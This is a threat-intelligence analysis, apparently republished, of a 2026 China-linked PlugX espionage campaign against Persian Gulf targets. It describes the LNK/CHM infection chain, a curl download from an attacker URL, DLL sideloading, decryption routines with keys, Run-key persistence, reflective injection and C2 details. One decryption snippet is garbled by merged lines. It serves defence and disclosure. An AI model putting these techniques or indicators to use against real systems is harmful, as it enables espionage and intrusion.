On March 1, 2026, security researchers from ThreatLabz detected a new cyber espionage campaign attributed to a China-linked threat actor targeting countries in the Persian Gulf. Notably, the operation began within the first 24 hours of renewed hostilities in the Middle East, suggesting the attackers rapidly adapted current geopolitical events to support their social engineering efforts.

The attackers used an Arabic-language lure referencing missile strikes to trick victims into opening malicious files. The campaign ultimately delivered a variant of the PlugX backdoor through a complex multi-stage infection chain.

Based on the techniques, infrastructure, and malware observed during the investigation, ThreatLabz attributes the activity to a China-nexus threat actor with high confidence. Researchers also assess, with moderate confidence, that the campaign may be linked to the group commonly known as Mustang Panda.

This analysis explores the complete attack sequence, including the use of Windows shortcut (LNK) files, CHM droppers, obfuscated shellcode loaders, and the final PlugX payload.

Key Findings

ThreatLabz identified a cyber campaign in March 2026 conducted by a China-associated threat actor targeting organizations in the Persian Gulf region.

The attackers deployed a multi-stage infection chain that ultimately installed a PlugX backdoor on compromised systems.

Both the shellcode loader and the PlugX malware were heavily obfuscated using techniques such as control flow flattening (CFF) and mixed boolean arithmetic (MBA), which significantly complicate reverse engineering.

The PlugX variant used in this campaign communicates with its command-and-control infrastructure through HTTPS and resolves domains using DNS-over-HTTPS (DoH).

Technical Analysis

Attack Chain Overview

The attack began with a ZIP archive designed to exploit interest in the ongoing Middle East conflict. Inside the archive was a Windows shortcut file (LNK). When the victim opened this file, it triggered the download of a malicious Windows Compiled HTML Help (CHM) file from a remote server controlled by the attackers.

The CHM file served as the initial delivery mechanism for a series of malicious payloads. The infection process progressed through several stages:

A shellcode loader
Highly obfuscated shellcode
Deployment of a PlugX backdoor variant

As part of the deception strategy, the attack also displayed a decoy PDF containing images of missile strikes. The Arabic text in the document translated to: “Iranian missile strikes against US base in Bahrain.”

This decoy was meant to convince victims they had opened a legitimate news-related file while the malware executed in the background.

Stage 1: ZIP Archive, LNK File, and CHM Downloader

The initial ZIP archive contained a Windows shortcut named: photo_2026-03-01_01-20-48.pdf.lnk

The filename was intentionally crafted with a double extension so it appeared to be a PDF document.

When executed, the shortcut used the command-line tool cURL to download a malicious CHM file from the following URL: hxxps://www.360printsol[.]com/2026/alfadhalah/thumbnail?img=index.png

The LNK then invoked the legitimate Windows HTML Help executable (hh.exe) with the -decompile parameter to extract the contents of the CHM file.

Three files were unpacked during this step:

Filename	Description
0.lnk	Second-stage Windows shortcut
3	Decoy PDF used for social engineering
4	TAR archive containing malicious components

After extraction, the first LNK executed the second-stage shortcut (0.lnk).

Stage 2: Secondary LNK, Decoy File, and TAR Extraction

The second LNK carried out several operations:

It renamed the decoy file 3 to photo_2026-03-01_01-20-48.pdf so the victim would see what appeared to be a legitimate document.
It treated file 4 as a TAR archive and extracted its contents into the system’s %AppData% directory.
It executed the file:

%AppData%\BaiduNetdisk\ShellFolder.exe --path a

This directory name was chosen to mimic the legitimate Baidu Netdisk application, helping the malware blend into the system.

ShellFolder.exe then used DLL sideloading to load a malicious DLL named ShellFolderDepend.dll.

ShellFolderDepend.dll: Shellcode Loader

The malicious DLL is a 32-bit component responsible for establishing persistence and launching the next stage of the attack.

All strings inside the DLL are encrypted and only decrypted during runtime using a custom XOR algorithm that combines an index value with a base constant.

KEY_BASE = 0x34
decrypted = []
for i, byte in enumerate(encrypted_bytes):
    key = (i + KEY_BASE) & 0xFF
    decrypted.append(chr(byte ^ key))
return "".join(decrypted)

Persistence Mechanism

Before executing the shellcode, the malware checks whether Bitdefender Agent (bdagent.exe) is running.

Two persistence methods are used depending on the result:

If Bitdefender is present

The malware creates a registry Run key using reg.exe:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Value: BaiNetdisk

If Bitdefender is not detected

The same registry key is created using the Windows API function RegSetValueExA.

API Hooking

Before decrypting the shellcode, the loader installs two inline API hooks:

Hook on GetCommandLineW

This hook alters the command-line return value to:

ShellFolder.exe 701 0

This manipulation makes it appear that the program was executed with specific arguments.

Hook on CreateProcessAsUserW

The hook restores the original API bytes and then calls Sleep indefinitely, preventing any child processes from being created.

Shellcode Decryption

The loader retrieves encrypted shellcode from a file named Shelter.ex.

The shellcode is decrypted using the Windows native API function SystemFunction033, which implements RC4, with the key:

20260301@@@

After decryption, the loader:

Allocates executable memory using VirtualAlloc
Copies the shellcode into memory
Transfers execution to it

PlugX Shellcode Loader

The shellcode responsible for loading the backdoor is heavily obfuscated. It employs control flow flattening (CFF) to disguise the execution logic.

Instead of executing code sequentially, the shellcode operates like a state machine. Each code block updates a state variable and then returns execution to a dispatcher that determines the next block to execute.

This technique significantly complicates reverse engineering.

API String Encryption

API names are encrypted and decrypted dynamically using another XOR routine. The algorithm is similar to the one used earlier but uses a different base constant: 0x36 instead of 0x34

The XOR logic itself is disguised using mixed boolean arithmetic, such as: (~x & K) | (x & ~K)

which mathematically equals: x ^ K

Payload Decryption

The shellcode contains an encrypted payload that is decrypted using a custom pseudo-random number generator (PRNG).

The process begins with a seed value:

0xc56dd7ea

The PRNG generates a keystream used to decrypt the embedded data.

seed = 0xc56dd7eadef prng_decrypt(encrypted_data, seed):
    state = seed
    decrypted_blob = bytearray(len(encrypted_data))    for i in range(len(encrypted_data)):
        state = (state + (state >> 3) + 0x13233366) & 0xFFFFFFFF
        decrypted_blob[i] = encrypted_data[i] ^ (state & 0xFF)    return decrypted_blob

The resulting data structure includes:

a 16-byte header
a payload compressed using the LZNT1 algorithm

The shellcode decompresses the payload using the Windows API RtlDecompressBuffer.

Anti-Forensics Techniques

The decompressed payload contains a corrupted PE header.

Critical structures such as:

IMAGE_DOS_HEADER
DOS stub
PE signature

are intentionally overwritten with random ASCII data.

However, certain fields—like the e_lfanew pointer and the COFF file header—remain intact so the loader can still process the binary internally.

This manipulation is designed to evade memory forensic tools.

Reflective DLL Injection

The decrypted payload is loaded directly into memory through reflective DLL injection.

The loader performs several steps:

Allocates memory with VirtualAlloc
Maps all DLL sections into memory
Applies relocations
Resolves imported functions
Marks the region executable

The first 0x20 bytes of the image base are repurposed as a context structure that contains configuration data for PlugX.

PlugX Backdoor

The final payload is a PlugX backdoor, also heavily obfuscated using the same techniques seen earlier:

Control Flow Flattening (CFF)
Mixed Boolean Arithmetic (MBA)
Encrypted API strings

The malware receives its configuration through the context structure passed to DllMain.

The configuration is decrypted in two stages.

PlugX Configuration

Stage 1

A custom algorithm decrypts the overall configuration blob.

Stage 2

Individual configuration fields are further decrypted using RC4 with the key:

qwedfgx202211

The decoded configuration includes:

Field	Value
Target file extensions	.doc, .pdf, .xls, .ppt, .mp3, .wav
Date filter	Last 30 days
C2 server	https://91.193.17[.]117:443
Persistence path	%ProgramFiles%\Microsoft\Display Broker
Registry name	DesktopDialogBroker
Service name	Microsoft Desktop Dialog Broker
Service description	Manages connection and configuration of local and remote display dialogs
RC4 key for C2 traffic	VD*1^N1OCLtAGM$U

Command and Control Capabilities

This PlugX variant supports multiple communication channels:

TCP
HTTPS
UDP
DNS-over-HTTPS via https://dns.google/dns-query

The malware can execute numerous commands, including:

Collecting system information
Launching plugins
Scanning the local network
Proxying traffic through other infected systems
Updating its configuration

It also includes several built-in plugins for functionality such as:

file system access
process monitoring
registry editing
keylogging
remote shell access
screen capture
network analysis
SQL interaction

Threat Attribution

ThreatLabz attributes the campaign to a China-linked threat actor with high confidence and believes it may be associated with Mustang Panda.

Several indicators support this assessment.

First, the campaign used the PlugX backdoor, a tool historically linked to Chinese cyber-espionage groups.

Second, the RC4 key used for decrypting the configuration (qwedfgx202211) matches one used in the DOPLUGS campaign reported in 2024.

Third, the shellcode decryption key format (YYYYMMDD@@@) closely resembles patterns used in earlier attacks attributed to Chinese actors.

Additionally, Mustang Panda is known for rapidly exploiting geopolitical events to craft convincing phishing lures. The use of a Middle East conflict-themed document aligns with this behavior.

Finally, the specific implementation of control flow flattening and the configuration decryption routines resemble code previously observed in attacks attributed to the PKPLUG group, another alias of Mustang Panda.

Conclusion

This campaign demonstrates how rapidly cyber-espionage groups can exploit real-world events to increase the effectiveness of their attacks. By referencing current geopolitical developments, the attackers crafted convincing lures that could easily deceive victims.

The operation relied on a sophisticated multi-stage infection chain involving LNK files, CHM droppers, encrypted shellcode, and a heavily obfuscated PlugX backdoor.

ThreatLabz advises organizations and individuals to remain cautious when opening unsolicited files or links claiming to provide breaking news about geopolitical conflicts, particularly those related to the ongoing Middle East situation.

China-Linked Hackers Launch PlugX Malware Campaign Targeting Persian Gulf Amid Middle East Conflict